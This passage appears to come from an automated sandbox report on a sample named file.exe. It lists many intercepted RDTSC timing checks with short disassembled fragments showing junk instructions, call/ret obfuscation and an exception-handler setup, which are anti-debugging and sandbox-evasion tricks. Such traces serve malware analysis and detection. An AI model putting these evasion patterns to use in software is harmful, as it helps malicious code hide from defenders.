              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90C72C second address: 90C751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FD978BA9B1Dh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d je 00007FD978BA9B16h 0x00000013 popad 0x00000014 push esi 0x00000015 jno 00007FD978BA9B16h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 90C751 second address: 90C7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 pushad 0x00000007 jg 00007FD979248A95h 0x0000000d jg 00007FD979248A7Ch 0x00000013 jng 00007FD979248A90h 0x00000019 jmp 00007FD979248A84h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 910081 second address: 910085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9100DB second address: 9100F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD979248A83h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push ebx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 910371 second address: 9103A2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FD978BA9B1Ah 0x00000012 pushad 0x00000013 jmp 00007FD978BA9B27h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9108B6 second address: 9108BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 910DE6 second address: 910DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 910DEA second address: 910DEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 910EC2 second address: 910EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 910EC6 second address: 910ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 910ECC second address: 910ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9112B6 second address: 9112BB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 911C78 second address: 911C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 911B01 second address: 911B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 91367A second address: 913680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 913680 second address: 913684 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 913684 second address: 913688 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9141B3 second address: 9141B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9141B9 second address: 9141BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9141BE second address: 9141F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add esi, dword ptr [ebp+124728B6h] 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D1BEFh], edx 0x0000001b push 00000000h 0x0000001d jne 00007FD979248A7Ch 0x00000023 xchg eax, ebx 0x00000024 push ebx 0x00000025 jnp 00007FD979248A78h 0x0000002b pop ebx 0x0000002c push eax 0x0000002d push esi 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 914A44 second address: 914A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 914A48 second address: 914A62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 914A62 second address: 914A6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FD978BA9B16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 914A6C second address: 914A7B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 914A7B second address: 914A81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 914A81 second address: 914A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 914A87 second address: 914A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 914A8B second address: 914B00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007FD979248A78h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov esi, 461A8A00h 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D28EAh], eax 0x00000033 jmp 00007FD979248A82h 0x00000038 push 00000000h 0x0000003a or di, 078Fh 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FD979248A7Ch 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 914B00 second address: 914B06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 914B06 second address: 914B10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD979248A76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 913EEE second address: 913F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jno 00007FD978BA9B16h 0x00000011 jc 00007FD978BA9B16h 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 916068 second address: 916082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979248A86h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 916082 second address: 9160F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD978BA9B18h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 or edi, 384C611Ch 0x0000002b push 00000000h 0x0000002d xor esi, dword ptr [ebp+122D182Dh] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FD978BA9B18h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000019h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f or esi, dword ptr [ebp+122D344Dh] 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FD978BA9B24h 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 915E31 second address: 915E43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jno 00007FD979248A76h 0x00000011 pop eax 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917FEE second address: 917FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917FF2 second address: 917FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 917FF8 second address: 917FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91965C second address: 9196CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FD979248A7Ch 0x0000000b ja 00007FD979248A76h 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 mov bx, si 0x00000018 push 00000000h 0x0000001a jc 00007FD979248A7Bh 0x00000020 add bx, 56BEh 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push edx 0x0000002a call 00007FD979248A78h 0x0000002f pop edx 0x00000030 mov dword ptr [esp+04h], edx 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc edx 0x0000003d push edx 0x0000003e ret 0x0000003f pop edx 0x00000040 ret 0x00000041 movzx ebx, si 0x00000044 xchg eax, esi 0x00000045 jno 00007FD979248A8Dh 0x0000004b push eax 0x0000004c pushad 0x0000004d pushad 0x0000004e pushad 0x0000004f popad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E533 second address: 91E539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E539 second address: 91E53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91A7F9 second address: 91A7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91D8D8 second address: 91D8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E53D second address: 91E541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91A7FE second address: 91A804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E541 second address: 91E5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add di, 0E18h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FD978BA9B18h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007FD978BA9B18h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 0000001Ch 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 push eax 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a jp 00007FD978BA9B16h 0x00000050 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 920490 second address: 92049D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9213D1 second address: 9213D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922402 second address: 922411 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD979248A7Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922411 second address: 9224BE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007FD978BA9B24h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push eax 0x00000017 call 00007FD978BA9B18h 0x0000001c pop eax 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 add dword ptr [esp+04h], 0000001Ah 0x00000029 inc eax 0x0000002a push eax 0x0000002b ret 0x0000002c pop eax 0x0000002d ret 0x0000002e jmp 00007FD978BA9B29h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FD978BA9B18h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov ebx, esi 0x00000051 push 00000000h 0x00000053 and bx, B5D7h 0x00000058 jno 00007FD978BA9B1Eh 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 pushad 0x00000061 jmp 00007FD978BA9B1Bh 0x00000066 js 00007FD978BA9B16h 0x0000006c popad 0x0000006d pop eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push ecx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923497 second address: 92351A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD979248A81h 0x0000000f nop 0x00000010 jmp 00007FD979248A7Fh 0x00000015 push 00000000h 0x00000017 jp 00007FD979248A79h 0x0000001d mov di, cx 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FD979248A78h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c mov di, 71D1h 0x00000040 xor ebx, dword ptr [ebp+122D3605h] 0x00000046 jnc 00007FD979248A79h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FD979248A7Ch 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9264B6 second address: 9264BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9264BE second address: 9264DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FD979248A76h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jnc 00007FD979248A7Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 921664 second address: 921673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A3AE second address: 92A3C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A3C9 second address: 92A3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A3CF second address: 92A3D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92A3D3 second address: 92A3D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F299 second address: 92F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FD979248A82h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F2B2 second address: 92F2CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD978BA9B25h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F2CD second address: 92F2D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92F2D1 second address: 92F2F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B23h 0x00000007 jo 00007FD978BA9B16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932C15 second address: 932C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9322CF second address: 9322D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9322D4 second address: 9322EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD979248A7Ah 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9325C6 second address: 9325E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD978BA9B27h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9325E4 second address: 9325F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 932784 second address: 93279B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD978BA9B1Eh 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93279B second address: 9327A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jns 00007FD979248A76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9327A7 second address: 9327C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD978BA9B1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FD978BA9B1Ah 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9327C4 second address: 9327CE instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD979248A7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92260A second address: 922629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD978BA9B1Eh 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 922629 second address: 922630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9226F6 second address: 9226FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92466A second address: 924746 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD979248A80h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a ja 00007FD979248A96h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FD979248A78h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b xor dword ptr [ebp+122D20E9h], edx 0x00000031 push dword ptr fs:[00000000h] 0x00000038 mov bx, dx 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 add dword ptr [ebp+122D1C80h], ecx 0x00000048 jmp 00007FD979248A87h 0x0000004d mov eax, dword ptr [ebp+122D0DB1h] 0x00000053 mov edi, dword ptr [ebp+122D3469h] 0x00000059 push FFFFFFFFh 0x0000005b push 00000000h 0x0000005d push eax 0x0000005e call 00007FD979248A78h 0x00000063 pop eax 0x00000064 mov dword ptr [esp+04h], eax 0x00000068 add dword ptr [esp+04h], 00000018h 0x00000070 inc eax 0x00000071 push eax 0x00000072 ret 0x00000073 pop eax 0x00000074 ret 0x00000075 nop 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 jmp 00007FD979248A87h 0x0000007e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 924746 second address: 92475C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FD978BA9B1Ch 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92574F second address: 925753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 925753 second address: 92575D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92765B second address: 927668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FD979248A7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937623 second address: 93762D instructions: 0x00000000 rdtsc 0x00000002 js 00007FD978BA9B16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93762D second address: 937659 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD979248A7Ch 0x00000008 jbe 00007FD979248A76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007FD979248A81h 0x00000019 mov eax, dword ptr [eax] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 937659 second address: 93765E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
